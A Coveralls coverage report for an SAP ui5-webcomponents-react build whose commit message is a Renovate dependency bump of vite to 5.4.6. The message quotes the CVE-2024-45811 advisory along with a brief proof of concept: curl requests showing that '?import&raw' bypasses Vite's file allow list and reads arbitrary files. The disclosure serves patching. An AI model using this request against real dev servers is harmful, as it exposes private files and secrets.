10910485087
89%

Ran 17 Sep 2024 08:24PM UTC

Jobs 6

Files 227

Run time 1min

Badge

Embed ▾

Committed 17 Sep 2024 08:20PM UTC coverage: 87.249%. Remained the same

Build # 10910485087

Build Type

push

github

Committed by

web-flow

Commit Message

chore(deps): update dependency vite to v5.4.6 [security] (#6378)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [vite](https://vitejs.dev)
([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite))
| [`5.4.5` ->
`5.4.6`](https://renovatebot.com/diffs/npm/vite/5.4.5/5.4.6) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/vite/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/vite/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/vite/5.4.5/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/vite/5.4.5/5.4.6?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2024-45811](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx)

### Summary
The contents of arbitrary files can be returned to the browser.

### Details
`@fs` denies access to files outside of Vite serving allow list. Adding
`?import&raw` to the URL bypasses this limitation and returns the file
content if it exists.

### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```

---

### Release Notes

<details>
<summary>vitejs/vite (vite)</summary>

###
[`v5.4.6`](https://redirect.github.co... (continued)

Run Details

2836 of 3792 branches covered (74.79%)

5043 of 5780 relevant lines covered (87.25%)

91925.38 hits per line

Uncovered Existing Lines

Lines	Coverage	∆	File
1	89.19	-2.7%	packages/charts/src/components/ColumnChart/ColumnChart.tsx

Subprojects

ID	Flag name	Job ID	Ran	Files	Coverage
1	main/src/components	10910485087.1	17 Sep 2024 08:28PM UTC	158	84.57	GitHub Action Run
2	compat	10910485087.2	17 Sep 2024 08:24PM UTC	169	19.32	GitHub Action Run
3	main/src/internal	10910485087.3	17 Sep 2024 08:24PM UTC	158	15.99	GitHub Action Run
4	charts	10910485087.4	17 Sep 2024 08:25PM UTC	216	28.72	GitHub Action Run
5	base	10910485087.5	17 Sep 2024 08:25PM UTC	158	16.08	GitHub Action Run
6	cypress-commands	10910485087.6	17 Sep 2024 08:24PM UTC	158	15.5	GitHub Action Run

SAP / ui5-webcomponents-react / 10910485087
89%

README BADGES
x

Markdown

Textile

RDoc

HTML

Rst

Uncovered Existing Lines

Subprojects

Source Files on build 10910485087

SAP / ui5-webcomponents-react / 10910485087 89%

README BADGES x

Markdown

Textile

RDoc

HTML

Rst

Uncovered Existing Lines

Subprojects

Source Files on build 10910485087

SAP / ui5-webcomponents-react / 10910485087
89%

README BADGES
x